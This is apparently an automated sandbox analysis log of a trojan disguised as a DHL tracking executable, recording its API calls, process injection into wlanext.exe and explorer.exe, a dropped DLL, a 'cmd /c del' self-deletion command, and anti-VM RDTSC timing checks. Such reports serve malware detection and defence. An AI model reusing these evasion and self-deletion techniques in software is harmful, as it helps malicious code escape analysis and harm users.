          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00A49820 NtEnumerateKey,1_2_00A49820
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00A4B040 NtSuspendThread,1_2_00A4B040
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00A499D0 NtCreateProcessEx,1_2_00A499D0
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00A49950 NtQueueApcThread,1_2_00A49950
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00A49A80 NtOpenDirectoryObject,1_2_00A49A80
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00A49A10 NtQuerySection,1_2_00A49A10
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00A4A3B0 NtGetContextThread,1_2_00A4A3B0
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00A49B00 NtSetValueKey,1_2_00A49B00
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00A495F0 NtQueryInformationFile,1_2_00A495F0
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00A49520 NtWaitForSingleObject,1_2_00A49520
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00A4AD30 NtSetContextThread,1_2_00A4AD30
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00A49560 NtWriteFile,1_2_00A49560
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00A496D0 NtCreateKey,1_2_00A496D0
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00A49610 NtEnumerateValueKey,1_2_00A49610
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00A49670 NtQueryInformationProcess,1_2_00A49670
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00A49650 NtQueryValueKey,1_2_00A49650
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00A49FE0 NtCreateMutant,1_2_00A49FE0
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00A49730 NtQueryVirtualMemory,1_2_00A49730
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00A4A710 NtOpenProcessToken,1_2_00A4A710
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00A49760 NtOpenProcess,1_2_00A49760
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00A49770 NtSetInformationFile,1_2_00A49770
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00A4A770 NtOpenThread,1_2_00A4A770
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03369710 NtQueryInformationToken,LdrInitializeThunk,11_2_03369710
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03369780 NtMapViewOfSection,LdrInitializeThunk,11_2_03369780
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03369FE0 NtCreateMutant,LdrInitializeThunk,11_2_03369FE0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03369660 NtAllocateVirtualMemory,LdrInitializeThunk,11_2_03369660
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03369650 NtQueryValueKey,LdrInitializeThunk,11_2_03369650
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03369A50 NtCreateFile,LdrInitializeThunk,11_2_03369A50
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_033696E0 NtFreeVirtualMemory,LdrInitializeThunk,11_2_033696E0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_033696D0 NtCreateKey,LdrInitializeThunk,11_2_033696D0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03369910 NtAdjustPrivilegesToken,LdrInitializeThunk,11_2_03369910
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03369540 NtReadFile,LdrInitializeThunk,11_2_03369540
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_033699A0 NtCreateSection,LdrInitializeThunk,11_2_033699A0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_033695D0 NtClose,LdrInitializeThunk,11_2_033695D0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03369860 NtQuerySystemInformation,LdrInitializeThunk,11_2_03369860
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03369840 NtDelayExecution,LdrInitializeThunk,11_2_03369840
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03369730 NtQueryVirtualMemory,11_2_03369730
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_0336A710 NtOpenProcessToken,11_2_0336A710
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03369B00 NtSetValueKey,11_2_03369B00
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03369770 NtSetInformationFile,11_2_03369770
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_0336A770 NtOpenThread,11_2_0336A770
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03369760 NtOpenProcess,11_2_03369760
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_0336A3B0 NtGetContextThread,11_2_0336A3B0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_033697A0 NtUnmapViewOfSection,11_2_033697A0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03369A20 NtResumeThread,11_2_03369A20
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03369610 NtEnumerateValueKey,11_2_03369610
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03369A10 NtQuerySection,11_2_03369A10
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03369A00 NtProtectVirtualMemory,11_2_03369A00
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03369670 NtQueryInformationProcess,11_2_03369670
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03369A80 NtOpenDirectoryObject,11_2_03369A80
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_0336AD30 NtSetContextThread,11_2_0336AD30
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03369520 NtWaitForSingleObject,11_2_03369520
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03369560 NtWriteFile,11_2_03369560
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03369950 NtQueueApcThread,11_2_03369950
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_033695F0 NtQueryInformationFile,11_2_033695F0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_033699D0 NtCreateProcessEx,11_2_033699D0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03369820 NtEnumerateKey,11_2_03369820
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_0336B040 NtSuspendThread,11_2_0336B040
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_033698A0 NtWriteVirtualMemory,11_2_033698A0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_033698F0 NtReadVirtualMemory,11_2_033698F0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_00A1A360 NtCreateFile,11_2_00A1A360
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_00A1A490 NtClose,11_2_00A1A490
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_00A1A410 NtReadFile,11_2_00A1A410
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_00A1A540 NtAllocateVirtualMemory,11_2_00A1A540
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_00A1A35B NtCreateFile,11_2_00A1A35B
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_00A1A40A NtReadFile,11_2_00A1A40A
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_00A1A53A NtAllocateVirtualMemory,11_2_00A1A53A
          Source: DHL AWB TRACKING DETAILS.exe, 00000000.00000003.360581864.0000000003066000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs DHL AWB TRACKING DETAILS.exe
          Source: DHL AWB TRACKING DETAILS.exe, 00000000.00000003.359981345.00000000031FF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs DHL AWB TRACKING DETAILS.exe
          Source: DHL AWB TRACKING DETAILS.exe, 00000001.00000002.436567042.0000000000C8F000.00000040.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs DHL AWB TRACKING DETAILS.exe
          Source: DHL AWB TRACKING DETAILS.exe, 00000001.00000002.437751802.0000000002A02000.00000040.10000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenamewlanext.exej% vs DHL AWB TRACKING DETAILS.exe
          Source: DHL AWB TRACKING DETAILS.exe, 00000001.00000002.436271704.0000000000AFF000.00000040.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs DHL AWB TRACKING DETAILS.exe
          Source: DHL AWB TRACKING DETAILS.exeVirustotal: Detection: 43%
          Source: DHL AWB TRACKING DETAILS.exeReversingLabs: Detection: 48%
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeFile read: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeJump to behavior
          Source: DHL AWB TRACKING DETAILS.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exe "C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exe"
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeProcess created: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exe "C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exe"
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\wlanext.exe C:\Windows\SysWOW64\wlanext.exe
          Source: C:\Windows\SysWOW64\wlanext.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exe"
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\SysWOW64\wlanext.exeProcess created: C:\Windows\explorer.exe "C:\Windows\explorer.exe" /LOADSAVEDWINDOWS
          Source: unknownProcess created: C:\Windows\explorer.exe "C:\Windows\explorer.exe" /LOADSAVEDWINDOWS
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeProcess created: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exe "C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exe" Jump to behavior
          Source: C:\Windows\SysWOW64\wlanext.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exe"Jump to behavior
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
          Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Caches\{3DA71D5A-20CC-432F-A115-DFE92379E91F}.3.ver0x0000000000000015.dbJump to behavior
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeFile created: C:\Users\user\AppData\Local\Temp\nsr8F19.tmpJump to behavior
          Source: classification engineClassification label: mal100.troj.evad.winEXE@9/4@1/0
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 0_2_00402012 CoCreateInstance,MultiByteToWideChar,0_2_00402012
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 0_2_00404275 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,0_2_00404275
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7024:120:WilError_01
          Source: C:\Windows\SysWOW64\wlanext.exeProcess created: C:\Windows\explorer.exe
          Source: unknownProcess created: C:\Windows\explorer.exe
          Source: Window RecorderWindow detected: More than 3 window changes detected
          Source: Binary string: wntdll.pdbUGP source: DHL AWB TRACKING DETAILS.exe, 00000000.00000003.360349373.0000000002F50000.00000004.00000800.00020000.00000000.sdmp, DHL AWB TRACKING DETAILS.exe, 00000000.00000003.360736432.00000000030E0000.00000004.00000800.00020000.00000000.sdmp, DHL AWB TRACKING DETAILS.exe, 00000001.00000002.436271704.0000000000AFF000.00000040.00000800.00020000.00000000.sdmp, DHL AWB TRACKING DETAILS.exe, 00000001.00000002.436124386.00000000009E0000.00000040.00000800.00020000.00000000.sdmp, wlanext.exe, 0000000B.00000002.636937480.0000000003300000.00000040.00000800.00020000.00000000.sdmp, wlanext.exe, 0000000B.00000002.637445370.000000000341F000.00000040.00000800.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: DHL AWB TRACKING DETAILS.exe, DHL AWB TRACKING DETAILS.exe, 00000001.00000002.436271704.0000000000AFF000.00000040.00000800.00020000.00000000.sdmp, DHL AWB TRACKING DETAILS.exe, 00000001.00000002.436124386.00000000009E0000.00000040.00000800.00020000.00000000.sdmp, wlanext.exe, wlanext.exe, 0000000B.00000002.636937480.0000000003300000.00000040.00000800.00020000.00000000.sdmp, wlanext.exe, 0000000B.00000002.637445370.000000000341F000.00000040.00000800.00020000.00000000.sdmp
          Source: Binary string: wlanext.pdb source: DHL AWB TRACKING DETAILS.exe, 00000001.00000002.437702980.00000000029F0000.00000040.10000000.00040000.00000000.sdmp
          Source: Binary string: wlanext.pdbGCTL source: DHL AWB TRACKING DETAILS.exe, 00000001.00000002.437702980.00000000029F0000.00000040.10000000.00040000.00000000.sdmp
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00417853 push edx; retf 1_2_004178A1
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00416978 push cs; retf 1_2_0041698A
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_0041D4B5 push eax; ret 1_2_0041D508
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_0041D56C push eax; ret 1_2_0041D572
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_0041D502 push eax; ret 1_2_0041D508
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_0041D50B push eax; ret 1_2_0041D572
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00A5D0D1 push ecx; ret 1_2_00A5D0E4
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_0337D0D1 push ecx; ret 11_2_0337D0E4
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_00A17853 push edx; retf 11_2_00A178A1
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_00A16978 push cs; retf 11_2_00A1698A
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_00A1D4B5 push eax; ret 11_2_00A1D508
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_00A1D502 push eax; ret 11_2_00A1D508
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_00A1D50B push eax; ret 11_2_00A1D572
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_00A1D56C push eax; ret 11_2_00A1D572
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 0_2_00405DA3 GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_00405DA3
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeFile created: C:\Users\user\AppData\Local\Temp\nsr8F1B.tmp\vzhghptrhu.dllJump to dropped file

          Hooking and other Techniques for Hiding and Protection

          barindex
          Self deletion via cmd delete
          Source: C:\Windows\SysWOW64\wlanext.exeProcess created: /c del "C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exe"
          Source: C:\Windows\SysWOW64\wlanext.exeProcess created: /c del "C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exe"Jump to behavior
          Source: C:\Windows\explorer.exeRegistry key monitored for changes: HKEY_CURRENT_USER_ClassesJump to behavior
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\wlanext.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion

          barindex
          Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeEvasive API call chain: GetPEB, DecisionNodes, ExitProcessgraph_0-3936
          Tries to detect virtualization through RDTSC time measurements
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeRDTSC instruction interceptor: First address: 0000000000409904 second address: 000000000040990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeRDTSC instruction interceptor: First address: 0000000000409B7E second address: 0000000000409B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\wlanext.exeRDTSC instruction interceptor: First address: 0000000000A09904 second address: 0000000000A0990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\wlanext.exeRDTSC instruction interceptor: First address: 0000000000A09B7E second address: 0000000000A09B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00409AB0 rdtsc 1_2_00409AB0
          Source: C:\Windows\explorer.exeFile opened / queried: SCSI#Disk&Ven_VMware&Prod_Virtual_disk#5&1ec51bf7&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}Jump to behavior
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeAPI coverage: 8.7 %
          Source: C:\Windows\SysWOW64\wlanext.exeAPI coverage: 9.7 %
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 0_2_00405D7C FindFirstFileA,FindClose,0_2_00405D7C
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 0_2_004053AA CloseHandle,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,0_2_004053AA
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 0_2_00402630 FindFirstFileA,0_2_00402630
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeAPI call chain: ExitProcess graph end nodegraph_0-3628
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeAPI call chain: ExitProcess graph end nodegraph_0-3630
          Source: explorer.exe, 00000014.00000000.563664219.0000000004560000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
          Source: explorer.exe, 00000004.00000000.391671803.00000000083EB000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware SATA CD00dRom0
          Source: explorer.exe, 00000014.00000000.537602479.00000000052A0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000Z
          Source: explorer.exe, 00000014.00000003.550839224.0000000004EF8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: AGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}efb8b}'
          Source: explorer.exe, 00000014.00000003.577172496.000000000F39D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000014.00000003.553294057.0000000004F3A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}x
          Source: explorer.exe, 00000014.00000003.551706537.0000000004F83000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}j
